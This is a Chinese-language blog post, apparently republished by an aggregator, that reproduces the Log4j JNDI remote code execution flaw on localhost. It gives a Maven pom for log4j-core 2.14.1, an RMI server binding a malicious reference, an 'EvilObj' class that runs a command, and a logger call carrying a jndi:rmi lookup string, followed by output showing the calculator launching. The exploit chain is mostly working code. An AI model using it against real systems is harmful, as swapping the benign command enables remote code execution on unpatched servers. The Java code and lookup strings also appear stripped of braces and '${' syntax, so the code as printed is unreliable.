快速复现利用Log4j漏洞启动windows计算器
Posted java_augur
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了快速复现利用Log4j漏洞启动windows计算器相关的知识,希望对你有一定的参考价值。
了解关于漏洞的描述,可以参考Vulnerability Affecting Multiple Log4j Versions Permits RCE Exploit
根据文章描述,首先下载JDK1.8u102,不能高于这个版本。
通过如下pom.xml建立一个maven项目
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>Log4jJNDI</groupId>
<artifactId>Log4jJNDI</artifactId>
<version>0.0.1-SNAPSHOT</version>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<version>3.7.0</version>
<configuration>
<source>$java.version</source>
<target>$java.version</target>
</configuration>
</plugin>
</plugins>
</build>
</project>新建类Log4jServer,这个类用来注册一个远程类。代码如下:
package testLog4j;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
public class Log4jServer
public static void main(String[] args)
try
LocateRegistry.createRegistry(1099);
Registry registry = LocateRegistry.getRegistry();
Reference evilObjReference = new Reference("testLog4j.EvilObj", "testLog4j.EvilObj", ".");
ReferenceWrapper evilObjReferenceObjWrapper = new ReferenceWrapper(evilObjReference);
registry.bind("evilObj", evilObjReferenceObjWrapper);
System.out.println("Server is running at port: 1099");
catch (Exception e)
e.printStackTrace();
用于打开计算器的远程类代码如下:
package testLog4j;
public class EvilObj
static
try
Runtime.getRuntime().exec("calc");
catch (Exception e)
e.printStackTrace();
下面的LogTest类用于展示如何通过打印日志,来调用远程类,
package testLog4j;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class LogTest
private static Logger logger = LogManager.getLogger("LogTest");
public static void main(String[] args)
logger.info("your operation system is: ", "$java:os");
logger.error("$jndi:rmi://127.0.0.1:1099/evilObj");
首先运行Log4jServer类,此时在端口1099提供远程类访问。
然后再运行LogTest, 在打印如下日志以后,windows下的计算机被成功打开。运行时需要设置参数-Dlog4j2.formatMsgNoLookups=false
12-17 22:15:42.331 [main] INFO LogTest
your operation system is: Windows 10 10.0, architecture: amd64-64
12-17 22:15:42.334 [main] ERROR LogTest
$jndi:rmi://127.0.0.1:1099/evilObjGood Luck,
Cheers!
以上是关于快速复现利用Log4j漏洞启动windows计算器的主要内容,如果未能解决你的问题,请参考以下文章